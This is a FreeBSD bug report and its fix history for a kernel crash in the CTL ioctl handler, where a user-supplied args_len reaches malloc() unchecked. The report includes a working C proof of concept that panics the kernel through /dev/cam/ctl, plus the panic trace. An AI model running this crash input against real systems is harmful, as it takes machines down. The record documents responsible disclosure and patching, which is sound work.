Bug 266136 - ctl_ioctl() passes user-supplied size directly to kernel malloc() -> potential crash
Summary: ctl_ioctl() passes user-supplied size directly to kernel malloc() -> potentia...
Status: Closed FIXED
Alias: None
Product: Base System
Classification: Unclassified
Component: kern (show other bugs)
Version: CURRENT
Hardware: Any Any
: --- Affects Some People
Assignee: freebsd-bugs (Nobody)
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2022-08-31 16:29 UTC by Robert Morris
Modified: 2022-09-14 17:29 UTC (History)
3 users (show)

See Also:


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Robert Morris 2022-08-31 16:29:41 UTC
ctl_ioctl() in cam/ctl/ctl.c says, under CTL_LUN_REQ:

                if (lun_req->args != NULL) {
                        packed = malloc(lun_req->args_len, M_CTL, M_WAITOK);

lun_req->args_len is supplied by the user program, with no sanity check.
Some values will crash the kernel, e.g. 0xffffffffffffffff.

A demo:

int main() {
  int fd = open("/dev/cam/ctl", 2);
  if(fd < 0) { perror("/dev/cam/ctl"); exit(1); }
  char buf[512];
  memset(buf, 0, sizeof(buf));
  strcpy(buf, "block");
  *(unsigned long long *)(buf + 32 + 14*8) = 0x8000000000000000ull; // args
  *(unsigned long long *)(buf + 32 + 16*8) = 0xffffffffffffffffull; // args_len
  ioctl(fd, 0xc168e121, buf); // CTL_LUN_REQ
}

panic: Assertion size > 0 failed at /usr/rtm/symbsd/src/sys/kern/subr_vmem.c:1332
panic() at panic+0x2a
vmem_alloc() at vmem_alloc+0xc8
kmem_malloc_domain() at kmem_malloc_domain+0x54
kmem_malloc_domainset() at kmem_malloc_domainset+0x36
malloc_large() at malloc_large+0x2a
malloc() at malloc+0xf8
ctl_ioctl() at ctl_ioctl+0x958
devfs_ioctl() at devfs_ioctl+0xbe
VOP_IOCTL_APV() at VOP_IOCTL_APV+0x30
VOP_IOCTL() at VOP_IOCTL+0x36
vn_ioctl() at vn_ioctl+0xba
devfs_ioctl_f() at devfs_ioctl_f+0x20
fo_ioctl() at fo_ioctl+0xa
kern_ioctl() at kern_ioctl+0x242
sys_ioctl() at sys_ioctl+0x120
syscallenter() at syscallenter+0xec
ecall_handler() at ecall_handler+0x18
do_trap_user() at do_trap_user+0xea
cpu_exception_handler_user() at cpu_exception_handler_user+0x72
Comment 1 Alexander Motin freebsd_committer freebsd_triage 2022-09-07 00:54:36 UTC
This device is available only to root user, so it is a form of foot shooting.  But OK, I'll patch it.
Comment 2 Ed Maste freebsd_committer freebsd_triage 2022-09-07 01:07:33 UTC
(In reply to Alexander Motin from comment #1)

Thanks

Please make a note in the commit message about the device being available only to root (and hence not requiring an advisory).
Comment 3 commit-hook freebsd_committer freebsd_triage 2022-09-07 02:08:32 UTC
A commit in branch main references this bug:

URL: https://cgit.FreeBSD.org/src/commit/?id=0586be48a97c5af50ba4f578d33211f81cc57016

commit 0586be48a97c5af50ba4f578d33211f81cc57016
Author:     Alexander Motin <mav@FreeBSD.org>
AuthorDate: 2022-09-07 01:58:27 +0000
Commit:     Alexander Motin <mav@FreeBSD.org>
CommitDate: 2022-09-07 01:58:27 +0000

    CTL: Validate IOCTL parameters.

    It was possible to cause kernel panic by passing too large args_len
    or non-NULL result_nvl.

    Though since the /dev/cam/ctl device is accessible only by root and
    used only by limited number of tools it was not a big problem.

    PR:     266115
    PR:     266136
    Reported by:    Robert Morris <rtm@lcs.mit.edu>
    MFC after:      1 week

 sys/cam/ctl/ctl.c       | 14 ++++++++++++++
 sys/cam/ctl/ctl_ioctl.h |  1 +
 2 files changed, 15 insertions(+)
Comment 4 commit-hook freebsd_committer freebsd_triage 2022-09-14 17:28:22 UTC
A commit in branch stable/13 references this bug:

URL: https://cgit.FreeBSD.org/src/commit/?id=c48d0754a05334cacbe6cd34871c10f3ef6f4d56

commit c48d0754a05334cacbe6cd34871c10f3ef6f4d56
Author:     Alexander Motin <mav@FreeBSD.org>
AuthorDate: 2022-09-07 01:58:27 +0000
Commit:     Alexander Motin <mav@FreeBSD.org>
CommitDate: 2022-09-14 17:27:04 +0000

    CTL: Validate IOCTL parameters.

    It was possible to cause kernel panic by passing too large args_len
    or non-NULL result_nvl.

    Though since the /dev/cam/ctl device is accessible only by root and
    used only by limited number of tools it was not a big problem.

    PR:     266115
    PR:     266136
    Reported by:    Robert Morris <rtm@lcs.mit.edu>
    MFC after:      1 week

    (cherry picked from commit 0586be48a97c5af50ba4f578d33211f81cc57016)

 sys/cam/ctl/ctl.c       | 14 ++++++++++++++
 sys/cam/ctl/ctl_ioctl.h |  1 +
 2 files changed, 15 insertions(+)
Comment 5 commit-hook freebsd_committer freebsd_triage 2022-09-14 17:29:24 UTC
A commit in branch stable/12 references this bug:

URL: https://cgit.FreeBSD.org/src/commit/?id=ce1895b7248d5601b34d0d6492539a7081a8d451

commit ce1895b7248d5601b34d0d6492539a7081a8d451
Author:     Alexander Motin <mav@FreeBSD.org>
AuthorDate: 2022-09-07 01:58:27 +0000
Commit:     Alexander Motin <mav@FreeBSD.org>
CommitDate: 2022-09-14 17:28:18 +0000

    CTL: Validate IOCTL parameters.

    It was possible to cause kernel panic by passing too large args_len
    or non-NULL result_nvl.

    Though since the /dev/cam/ctl device is accessible only by root and
    used only by limited number of tools it was not a big problem.

    PR:     266115
    PR:     266136
    Reported by:    Robert Morris <rtm@lcs.mit.edu>
    MFC after:      1 week

    (cherry picked from commit 0586be48a97c5af50ba4f578d33211f81cc57016)

 sys/cam/ctl/ctl.c       | 14 ++++++++++++++
 sys/cam/ctl/ctl_ioctl.h |  1 +
 2 files changed, 15 insertions(+)